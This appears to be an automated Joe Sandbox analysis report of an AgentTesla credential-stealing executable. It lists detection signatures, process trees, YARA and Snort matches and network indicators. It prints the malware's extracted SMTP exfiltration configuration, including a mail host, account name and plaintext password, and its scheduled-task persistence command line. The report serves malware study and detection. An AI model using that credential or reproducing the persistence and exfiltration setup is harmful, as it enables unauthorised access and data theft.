Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Analysis ID:756190
MD5:65cf34490748f7924db84dc043f5d81e
SHA1:1ea50942d4acf0561bd6bcb3fe0195069eb5c259
SHA256:96642679196d3f732718eebf2e7970d7eca03ddc4645b3f0292db847ed82b24e
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe (PID: 5996 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe MD5: 65CF34490748F7924DB84DC043F5D81E)
    • schtasks.exe (PID: 4572 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • IwUNvHNy.exe (PID: 4664 cmdline: C:\Users\user\AppData\Roaming\IwUNvHNy.exe MD5: 65CF34490748F7924DB84DC043F5D81E)
    • schtasks.exe (PID: 3236 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • IwUNvHNy.exe (PID: 5060 cmdline: {path} MD5: 65CF34490748F7924DB84DC043F5D81E)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.525739728.0000000003164000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
          • 0x15a83a:$a13: get_DnsResolver
          • 0x190a5a:$a13: get_DnsResolver
          • 0x158f64:$a20: get_LastAccessed
          • 0x18f184:$a20: get_LastAccessed
          • 0x15b247:$a27: set_InternalServerPort
          • 0x191467:$a27: set_InternalServerPort
          • 0x15b590:$a30: set_GuidMasterKey
          • 0x1917b0:$a30: set_GuidMasterKey
          • 0x159076:$a33: get_Clipboard
          • 0x18f296:$a33: get_Clipboard
          • 0x159084:$a34: get_Keyboard
          • 0x18f2a4:$a34: get_Keyboard
          • 0x15a425:$a35: get_ShiftKeyDown
          • 0x190645:$a35: get_ShiftKeyDown
          • 0x15a436:$a36: get_AltKeyDown
          • 0x190656:$a36: get_AltKeyDown
          • 0x159091:$a37: get_Password
          • 0x18f2b1:$a37: get_Password
          • 0x159b80:$a38: get_PasswordHash
          • 0x18fda0:$a38: get_PasswordHash
          • 0x15ac7b:$a39: get_DefaultCredentials
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32bcc:$s10: logins
              • 0x3264c:$s11: credential
              • 0x2e906:$g1: get_Clipboard
              • 0x2e914:$g2: get_Keyboard
              • 0x2e921:$g3: get_Password
              • 0x2fca5:$g4: get_CtrlKeyDown
              • 0x2fcb5:$g5: get_ShiftKeyDown
              • 0x2fcc6:$g6: get_AltKeyDown
              0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x300ca:$a13: get_DnsResolver
              • 0x2e7f4:$a20: get_LastAccessed
              • 0x30ad7:$a27: set_InternalServerPort
              • 0x30e20:$a30: set_GuidMasterKey
              • 0x2e906:$a33: get_Clipboard
              • 0x2e914:$a34: get_Keyboard
              • 0x2fcb5:$a35: get_ShiftKeyDown
              • 0x2fcc6:$a36: get_AltKeyDown
              • 0x2e921:$a37: get_Password
              • 0x2f410:$a38: get_PasswordHash
              • 0x3050b:$a39: get_DefaultCredentials
              10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 13 entries

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, ParentProcessId: 5996, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp, ProcessId: 4572, ProcessName: schtasks.exe
                Timestamp:192.168.2.6111.118.212.38497235872030171 11/29/22-19:38:19.561263
                SID:2030171
                Source Port:49723
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.6111.118.212.38497185872030171 11/29/22-19:37:32.174046
                SID:2030171
                Source Port:49718
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeJoe Sandbox ML: detected
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ImbSRib.pdb source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr
                Source: Binary string: ImbSRib.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr

                Networking

                barindex
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49718 -> 111.118.212.38:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49723 -> 111.118.212.38:587
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeDNS query: name: api.ipify.org
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewIP Address: 3.232.242.170 3.232.242.170
                Source: Joe Sandbox ViewIP Address: 3.232.242.170 3.232.242.170
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficTCP traffic: 192.168.2.6:49718 -> 111.118.212.38:587
                Source: global trafficTCP traffic: 192.168.2.6:49718 -> 111.118.212.38:587
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://UrUbMY.com
                Source: IwUNvHNy.exe, 0000000E.00000002.522029143.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000003.478235783.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537441042.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.strictfacilityservices.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://strictfacilityservices.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: IwUNvHNy.exe, 0000000E.00000002.533988988.00000000033AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://LwV7dxVvQwzS29UTCu.com
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgmail.strictfacilityservices.comaccounts
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.308476627.00000000014CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary

                barindex
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 11.2.IwUNvHNy.exe.293a138.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.31ea1d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0063866u002d9900u002d46A9u002dBAF8u002dC30A0EC83145u007d/u00340AC4BAEu002d6FADu002d49F9u002dADA9u002d9C669FAB2230.csLarge array initialization: .cctor: array initializer size 10995
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 11.2.IwUNvHNy.exe.293a138.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
